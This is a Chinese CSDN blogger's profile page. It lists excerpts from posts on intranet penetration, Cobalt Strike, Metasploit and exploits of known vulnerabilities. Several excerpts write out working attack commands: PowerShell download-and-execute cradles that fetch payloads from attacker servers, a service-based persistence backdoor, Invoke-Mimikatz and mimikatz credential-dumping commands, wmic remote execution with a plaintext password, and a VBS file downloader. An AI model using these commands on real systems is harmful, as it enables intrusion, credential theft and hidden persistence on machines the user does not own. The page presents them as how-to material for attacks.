mirror97black
码龄7年
关注
提问 私信
  • 博客:79,177
    79,177
    总访问量
  • 18
    原创
  • 2,056,352
    排名
  • 29
    粉丝
  • 0
    铁粉
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:四川省
  • 加入CSDN时间: 2017-07-31
博客简介:

mirror97black的博客

查看详细资料
个人成就
  • 获得23次点赞
  • 内容获得4次评论
  • 获得89次收藏
  • 代码片获得154次分享
创作历程
  • 12篇
    2018年
  • 6篇
    2017年
成就勋章
TA的专栏
  • 漏洞
    9篇
  • msf
    1篇
  • 内网渗透
    8篇
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

远程连接windows

3389在windows-运行,输入mstsc,回车即可 需要对方开启3389端口,并且你有对方机器的用户名和密码wmic远程连接wmic /node:"192.168.2.23" /password:"abc123" /user:"administrator"如果能够远程连接成功,就可以执行一些wmic命令wmic /node:"192.168.2.23" /p...
原创
发布博客 2018.04.17 ·
1961 阅读 ·
1 点赞 ·
0 评论 ·
2 收藏

msf传递shell给cobalt strike

前提:拿到msf的session会话 方法1:在cmd中执行cobalt strike的scripted web delivery命令,比如powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.20:80/a'))"方法2:通过msf的expl...
原创
发布博客 2018.04.11 ·
2288 阅读 ·
1 点赞 ·
1 评论 ·
1 收藏

mimikatz使用

mimikatz使用时需要高权限,至少是administrator权限 mimikatz抓取密码的命令需要system权限,可以先进行提权privilege::debug //提升权限(从administrator提升到system)抓取hashsekurlsa::logonpasswords //获取当前在线用户的明文密码(需要高权限运行)lsadump::lsa ...
原创
发布博客 2018.04.11 ·
6997 阅读 ·
1 点赞 ·
0 评论 ·
7 收藏

端口转发与端口映射

端口映射端口映射是NAT的一种,功能是把在公网的地址转翻译成私有地址, 采用路由方式的ADSL宽带路由器拥有一个动态或固定的公网IP,ADSL直接接在HUB或交换机上,所有的电脑共享上网。端口映射就是将外网主机的IP地址的一个端口映射到内网中一台机器,提供相应的服务。当用户访问该IP的这个端口时,服务器自动将请求映射到对应局域网内部的机器上。端口映射有动态和静态之分。通俗来讲,端口映射...
原创
发布博客 2018.04.09 ·
11173 阅读 ·
7 点赞 ·
0 评论 ·
35 收藏

cobalt strike开机自启动后门

前提:拿到cobalt strike的session设置开机自启动服务使用sc命令创建服务sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.1...
原创
发布博客 2018.04.09 ·
5169 阅读 ·
3 点赞 ·
2 评论 ·
20 收藏

内网渗透之收集信息

收集本机ip信息ipconfig /all查看进程,注意杀软tasklist /v查看安装软件的版本(两种方式)wmic product > version.txt利用wmic命令,可以将结果输出到文本中powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,...
原创
发布博客 2018.04.08 ·
1759 阅读 ·
0 点赞 ·
0 评论 ·
5 收藏

内网渗透技巧

通过powershell 运行mimikatzpowershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" 获取hash之后,解出明文密码 将目标机器共享盘映射到本地的h盘net use h: \\ip\c$ "密码"...
原创
发布博客 2018.04.04 ·
554 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

windows命令行下载文件

vbs下载通过写一个vbs脚本来下载文件 在windows机器中,命令行执行以下各条命令echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbsecho Set Shell = CreateObject("Wscript.Shell") >>zl.vbsecho Post.Open "GET","htt...
原创
发布博客 2018.04.03 ·
3560 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

利用cobalt strike获取域控权限

cobalt strikecobalt strike是一个后渗透工具,和msf有很多相似的地方,也可以看做是一个远控工具。前期准备获取一个cobalt strike的会话。可以利用cs本身的payload,或者是通过别的shell反弹到cs。域内收集信息通过一些cmd命令,可以收集到域内的信息 在cs的会话中,执行命令 查看有多少域和工作组shell net...
原创
发布博客 2018.04.02 ·
2393 阅读 ·
2 点赞 ·
0 评论 ·
4 收藏

利用metasploit生成免杀后门

免杀之前的博客中,有利用msf生成代码,目标机执行然后获得shell。但是现在有很多杀软,对各种木马有检测机制,执行危险代码或者运行危险程序,杀软会进行阻止。免杀有很多种方式,今天介绍一种利用msf生成shellcode免杀,编译为exe文件,这种免杀能够绕过大部分杀软静态免杀静态免杀是能够绕过杀软检测,运行时也不会报毒。但是执行危险命令就会报毒,比如说新建用户、进程注入等。使
原创
发布博客 2018.01.26 ·
5656 阅读 ·
4 点赞 ·
0 评论 ·
21 收藏

IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)

漏洞简介漏洞编号:CVE-2017-7269发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)漏洞简述:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。漏洞类型:缓冲区溢出漏洞等
原创
发布博客 2018.01.24 ·
4342 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

jboss漏洞利用

JBOSSJBoss应用服务器(JBoss AS)是一个被广泛使用的开源Java应用服务器。它是JBoss企业中间件(JEMS)的一部分,并且经常在大型企业中使用。因为这个软件是高度模块化和松耦合的,导致了它很很复杂,同时也使它易成为攻击者的目标。使用工具msf,jexboss,zoomeye,fofa下载jexboss在github中搜索jexboss下载漏洞利用代码
原创
发布博客 2018.01.24 ·
8300 阅读 ·
0 点赞 ·
0 评论 ·
5 收藏

提权

提权
原创
发布博客 2017.12.20 ·
1927 阅读 ·
1 点赞 ·
0 评论 ·
2 收藏

代码审计

代码审计
原创
发布博客 2017.12.20 ·
522 阅读 ·
1 点赞 ·
0 评论 ·
2 收藏

Struts2远程命令执行漏洞

Struts2 远程命令执行漏洞
原创
发布博客 2017.12.20 ·
14842 阅读 ·
0 点赞 ·
1 评论 ·
10 收藏

ImageMagick 命令执行漏洞

ImageMagick 命令执行漏洞
原创
发布博客 2017.12.20 ·
2474 阅读 ·
1 点赞 ·
0 评论 ·
3 收藏

ARP攻击

ARP攻击,DNS欺骗
原创
发布博客 2017.12.20 ·
559 阅读 ·
1 点赞 ·
0 评论 ·
3 收藏

OpenSSL心脏滴血漏洞

OpenSSL心脏滴血漏洞
原创
发布博客 2017.12.08 ·
4665 阅读 ·
0 点赞 ·
0 评论 ·
4 收藏
加载更多